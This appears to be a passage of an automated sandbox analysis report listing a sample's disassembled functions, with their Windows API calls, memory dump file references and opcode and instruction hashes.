                                                                                      Function 00D712C2 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3351165006-0
                                                                                      • Opcode ID: ca85c7bf17536109632d261759023f1f5f4f71b266c7d0ae14db5cbf4949e820
                                                                                      • Instruction ID: 80fbef5a7c9c7e19b30dc27a591aa6125d1ef4b308fa6ba223ce407621c9df52
                                                                                      • Opcode Fuzzy Hash: ca85c7bf17536109632d261759023f1f5f4f71b266c7d0ae14db5cbf4949e820
                                                                                      • Instruction Fuzzy Hash: 8EC01232058201BFCB010B74DC09C2EBBA99B96211F00CA04B4A5C0160C338C010DB32
                                                                                      Function 00D7FC30 Relevance: 2.5, APIs: 2, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(00DB1E74,?,?,?,?,00D7A5A0,?,?,?,?,00D9F79B,000000FF), ref: 00D7FC42
                                                                                      • LeaveCriticalSection.KERNEL32(00DB1E74,?,?,?,?,00D7A5A0,?,?,?,?,00D9F79B,000000FF), ref: 00D7FC99
                                                                                        • Part of subcall function 00D7F9D1: ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 00D7FA05
                                                                                        • Part of subcall function 00D7F9D1: CloseHandle.KERNEL32(?,?), ref: 00D7FA1F
                                                                                        • Part of subcall function 00D7F9D1: DeleteCriticalSection.KERNEL32(?), ref: 00D7FA38
                                                                                        • Part of subcall function 00D7F9D1: CloseHandle.KERNELBASE(?), ref: 00D7FA44
                                                                                        • Part of subcall function 00D7F9D1: CloseHandle.KERNEL32(?), ref: 00D7FA50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCriticalHandleSection$DeleteEnterLeaveReleaseSemaphore
                                                                                      • String ID:
                                                                                      • API String ID: 3265325312-0
                                                                                      • Opcode ID: 707846239a44194d89b2352d25ce22bf4574afc129c55f055640e91add2a5cf3
                                                                                      • Instruction ID: 8bc00b24a663d41224b3df744a4baedf4809b63de80efa6ec394f113056205ed
                                                                                      • Opcode Fuzzy Hash: 707846239a44194d89b2352d25ce22bf4574afc129c55f055640e91add2a5cf3
                                                                                      • Instruction Fuzzy Hash: EDF0A437204324DB96226724ECC09BEB71CD6867A43598626FC08A7381FB35EC0147B0
                                                                                      Function 00D719B1 Relevance: 1.8, APIs: 1, Instructions: 275COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 208dc9582c64a88c71686995744490caff4f4aaa79632c57d8d756d98754bbe2
                                                                                      • Instruction ID: f1ee9c5eabdfcd3dc28056ee26d5f1f82ff92b2b038ac4514e8aab70926500ba
                                                                                      • Opcode Fuzzy Hash: 208dc9582c64a88c71686995744490caff4f4aaa79632c57d8d756d98754bbe2
                                                                                      • Instruction Fuzzy Hash: 80B1D378A00246AEEB29CF7CC485BB9FBA5FF05304F18835AD45D93281E7319955CBB1
                                                                                      Function 00D7820B Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D78210
                                                                                        • Part of subcall function 00D7137E: __EH_prolog.LIBCMT ref: 00D71383
                                                                                        • Part of subcall function 00D7137E: new.LIBCMT ref: 00D713FB
                                                                                        • Part of subcall function 00D719B1: __EH_prolog.LIBCMT ref: 00D719B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 8ba897593f1c65978c3ba3a64c31413010345dd6c2270415ce80efc9191e9195
                                                                                      • Instruction ID: d0fe761b48836e8f3c3a4861ffeae9d94f1e1243dbc759d8b7b5087c12715f81
                                                                                      • Opcode Fuzzy Hash: 8ba897593f1c65978c3ba3a64c31413010345dd6c2270415ce80efc9191e9195
                                                                                      • Instruction Fuzzy Hash: 0F4186719406589ADB24EB64CC55BEA7769EF50700F4480EAE58E93053FF745EC8EB30
                                                                                      Function 00D821E6 Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 6fad3813819460f27d101c331a8c49a29ccc5f2d7d2dc7e60c1c60974f229914
                                                                                      • Instruction ID: aaaf6c3828a23ca1851d70c8dd6f58146a104e3150e3685c874cb2602fa2525c
                                                                                      • Opcode Fuzzy Hash: 6fad3813819460f27d101c331a8c49a29ccc5f2d7d2dc7e60c1c60974f229914
                                                                                      • Instruction Fuzzy Hash: 7E2191B1E41615ABDB14BFB9CC41B6BB6A8FB14314F04463AE909EB681E7709940C7B8
                                                                                      Function 00D89485 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D8948A
                                                                                        • Part of subcall function 00D7137E: __EH_prolog.LIBCMT ref: 00D71383
                                                                                        • Part of subcall function 00D7137E: new.LIBCMT ref: 00D713FB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 6fea197415152e607a1501be008ef5c2d4652320f81f411bc7684cc1d60e22bd
                                                                                      • Instruction ID: 98c6b811711d1d4ef2ef83e1f6947009277af9367b417c33d8d28000b4c8ded2
                                                                                      • Opcode Fuzzy Hash: 6fea197415152e607a1501be008ef5c2d4652320f81f411bc7684cc1d60e22bd
                                                                                      • Instruction Fuzzy Hash: 56216B76C04249AACF15EF98D9519EEB7B4EF19300F1445EAE809A7202E635AE05CB70
                                                                                      Function 00D790D0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 116e3f9ba3860b8744da774d5b8fdb76ebed9677e6fefea93668cf1f966e4c64
                                                                                      • Instruction ID: f0bba1975c9dbaec8f1028de928450a0a837b9c240eaffb48a7cd1a393fa7c63
                                                                                      • Opcode Fuzzy Hash: 116e3f9ba3860b8744da774d5b8fdb76ebed9677e6fefea93668cf1f966e4c64
                                                                                      • Instruction Fuzzy Hash: A6118273A50529ABCF12AF68DC969DEB736FF48740F448525FC19B7221EA309C1087B0
                                                                                      Function 00D959FC Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00D923AA,?,0000015D,?,?,?,?,00D92F29,000000FF,00000000,?,?), ref: 00D95A2E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: cc2550cbeacabc985f88e6f3733e65e2b35380c32e56cfcf14b0f46c5d9fea01
                                                                                      • Instruction ID: ca9b6ae4483df8eb441445818eb9bc96ebc9fc4a5c3fa963fc62e0d51f7a3e6d
                                                                                      • Opcode Fuzzy Hash: cc2550cbeacabc985f88e6f3733e65e2b35380c32e56cfcf14b0f46c5d9fea01
                                                                                      • Instruction Fuzzy Hash: 75E0E531141A215AEF332B61BC42B5A3648EF113A4F090330BC0696198CB31EC0143BC
                                                                                      Function 00D75B35 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D75B3A
                                                                                        • Part of subcall function 00D7AC66: __EH_prolog.LIBCMT ref: 00D7AC6B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: eceadb9d1162091986880e2d5be269782890fba15e7d59a12775e7e31ca84dfb
                                                                                      • Instruction ID: 89fd62af7f674fb750a75231c5773465c66cdd635beec110b5d6cc677ae01400
                                                                                      • Opcode Fuzzy Hash: eceadb9d1162091986880e2d5be269782890fba15e7d59a12775e7e31ca84dfb
                                                                                      • Instruction Fuzzy Hash: 83014B34904785DACB25E7A8D4557EDB7E4DB56304F40C0ADAC5D53282EBB42B08A773
                                                                                      Function 00D7A145 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D7A174
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseFind
                                                                                      • String ID:
                                                                                      • API String ID: 1863332320-0
                                                                                      • Opcode ID: 9d1ab9b9ae366b16f744061ba7cb9696aafb6369884e07efbf530a5b7d01c4c6
                                                                                      • Instruction ID: e2acae4c6eeeae6aae84edbcffa0fb9244e2053b013f6bf271062f14eb4d3dcb
                                                                                      • Opcode Fuzzy Hash: 9d1ab9b9ae366b16f744061ba7cb9696aafb6369884e07efbf530a5b7d01c4c6
                                                                                      • Instruction Fuzzy Hash: 85F0E232409380EEDE229BB88805BCFBB909F46331F04CA49F5FD42192D27550858733
                                                                                      Function 00D71E8E Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D71E93
                                                                                        • Part of subcall function 00D718F6: __EH_prolog.LIBCMT ref: 00D718FB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: a7a813fedcd63dc8f3b543698381bd09c0d1850705d4613e7a27206a65b13dd3
                                                                                      • Instruction ID: 5cd1baf3a1865dc6d40fb121df5d0e323bd852255ab33f658f1eaeb656c609cd
                                                                                      • Opcode Fuzzy Hash: a7a813fedcd63dc8f3b543698381bd09c0d1850705d4613e7a27206a65b13dd3
                                                                                      • Instruction Fuzzy Hash: C6F07FB1D112999ECF41EFA898456EEBBB5FB18300F1442BAE419E7202E7355A048BB1
                                                                                      Function 00D71E93 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D71E93
                                                                                        • Part of subcall function 00D718F6: __EH_prolog.LIBCMT ref: 00D718FB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                      • Instruction ID: dee17ed370d67eb83122d57f3bca8c2255cb4dae58460c117e48926600c51b36
                                                                                      • Opcode Fuzzy Hash: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                      • Instruction Fuzzy Hash: 89F092B1C112999ECF41EFA8C8456EEBBF5FB18300F1442BAD409E7202E7355604CBA1
                                                                                      Function 00D7F8F2 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetThreadExecutionState.KERNEL32(00000001), ref: 00D7F927
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExecutionStateThread
                                                                                      • String ID:
                                                                                      • API String ID: 2211380416-0
                                                                                      • Opcode ID: 07c28294e20dfa31d49eb27096ed032a1a0f2370ea7936acb3bcfd1b49cf32fb
                                                                                      • Instruction ID: 3eb4f0c8f4dc93f23564a7e0dacaf0a95c3c20d88b92d9af6152acbe8ecd9c89
                                                                                      • Opcode Fuzzy Hash: 07c28294e20dfa31d49eb27096ed032a1a0f2370ea7936acb3bcfd1b49cf32fb
                                                                                      • Instruction Fuzzy Hash: 03D0C25031421026D63133286806BBD19078FCB320F094036B108923D2FA45485AA2F2
                                                                                      Function 00D88B65 Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GdipAlloc.GDIPLUS(00000010), ref: 00D88B6B
                                                                                        • Part of subcall function 00D88924: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D88945
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                      • String ID:
                                                                                      • API String ID: 1915507550-0
                                                                                      • Opcode ID: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                      • Instruction ID: 85a8c35c879e74609115719707c16e08df10062595880c9249f6f482a5a0cbbb
                                                                                      • Opcode Fuzzy Hash: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                      • Instruction Fuzzy Hash: 44D0A77060010CBBDF507E618C0297DBAD8DB41390F848135BC0496150EE72ED117771
                                                                                      Function 00D7971A Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileType.KERNELBASE(000000FF,00D7964C), ref: 00D79726
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
